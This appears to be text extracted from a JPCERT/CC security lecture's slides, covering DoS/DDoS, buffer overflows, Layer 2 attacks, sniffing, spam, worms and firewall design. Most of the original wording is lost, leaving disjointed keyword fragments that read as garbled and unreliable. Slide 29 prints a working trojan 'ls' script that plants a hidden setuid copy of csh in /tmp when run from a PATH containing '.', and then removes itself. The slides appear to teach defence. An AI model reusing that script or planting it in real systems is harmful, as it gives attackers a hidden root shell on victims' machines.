JPCERT/CC 1
Firewall 2
Security Incident 3
Cgi-bin Cross Site Scripting (CSS) 4
Statistics@JPCERT/CC 3,000 2,500 2,000 1,500 1,000 500 0 1996Q4 1997 1998 1999 2000 2001 2002 Number of Reports 5
2002 JPCERT/CC 6
Port Scanning & Probe. Port scanning shellcode SPAM Denial of Services (DoS) DoS 7
48 bugtraq WWW IRC 8
DoS Excessive traffic / request generator WWW IRC Layer2 Public access 9
SPAM DoS Virus 10
Buffer Overflow Attack wuftp, Netscape Enterprise Server, Microsoft IIS,. (boundary check) Internet Worm (1988) 11
Buffer Overflow Attack Buffer ( ) Boundary Check 12
Buffer Overflow Attack Buffer 13
Buffer Overflow Attack Coding rule Code management process Testing process 14
DoS Denial of Service Attack IP Source IP address spoofing IP traceback 15
DDoS Distributed DoS Attack DoS 2000 2 : Yahoo CNN ebay, Amazon DDoS 1999 8 trinoo DDoS FBI ISP 16
DDoS Zombie 1. 2. trigger 17
DDoS (root DNS) 2002 11 13 root DNS server. DoS. 18
Smurf Attack 19
CodeRed Nimda 20
DoS WIDE Project 600Mbps 10 PC L3 DoS 21
Out-band Management L3SW/router Management Center 22
Out-band Management L3SW OS OS L3SW VLAN 23
Layer 2 Layer 2 Public access 24
MAC address MAC address filtering MAC address Layer 2 MAC Ethernet Ethernet L2 25
Layer 2 Layer2 MAC MAC address flooding 26
Layer 2. Layer 2 SW MAC SNMP 27
(shell) (malicious code) (backdoor) wuftp 28
PATH=.:/usr/ucb:/usr/bin:/bin % cat./ls #!/bin/sh cp /bin/csh /tmp/hidden/csh$$ chmod 4711 /tmp/hidden/csh$$ /bin/ls $* /bin/rm -f./ls 2>&1 > /dev/null % 29
root tcpdump (clear text) 30
ssh SSL/TLS Web E-Commerce IPsec VPN (Virtual Private Network) 2 e.g. 31
(3) Tapping Device Linux Ethernet Software Snooper Internet café Plathome Open Box, Internet café Firewall, DHCP server 32
2003 3 6, asahi.com Software snooper Keyboard Anonymous mail free mail) 2 33
Packet sniffer 34
/etc/passwd cracking software crack tuning Social Engineering Attack 35
Email Spoofing SPAM From Email Bombardment 36
SPAM SPAM (malicious code) SPAM Professional spammer SPAM / one-to-one marketing CAUCE (www.cause.org) 37
IP spoofing 38
Virus Love-Letter.txt CodeRed, CodeRed-II, Nimda, W32.Klez,. 39
OS Solaris sadmind buffer overflow sadimind Solaris Worm Worm Windows IIS IIS IIS 40
CodeRed 41
42
. End user computer.. 43
44
45
(audit) 46
Integrity management 47
CISO (Chief Information and Security Officer) CISO 48
HRM (Human Resource Management) and other RM Public Relations and Publicity activities. 49
50
51
Honeypot firewall Load splitting (DoS (DoS IDS, virus check,. Monitoring & analysis Out-band management 52
Wire-speed 1Gbps IPv6 dual stack architecture IDS false alert S/N IDS? 53
High performance FW (1) Quarantine zone L2 LB L2 SW L3 Routing (traffic marking) (10G bb) 54
High performance FW (2) Quarantine Quarantine Quarantine Honey pot Management Center 55
Multifunctional FW Firewall Intranet VPN/SSH gateway SMTP forwarder Other App. gateway 56
: IDS SMTP virus check WWW contents filtering monitoring (10G bb) 57
FW, IDS 58
Pass authenticated traffic only VPN demarcation point Internal demarcation (VPN) External network (Internet) VPN relay (non-vpn) 59
Out-band Management L3SW/router Management Center 60
61
ToDo items 62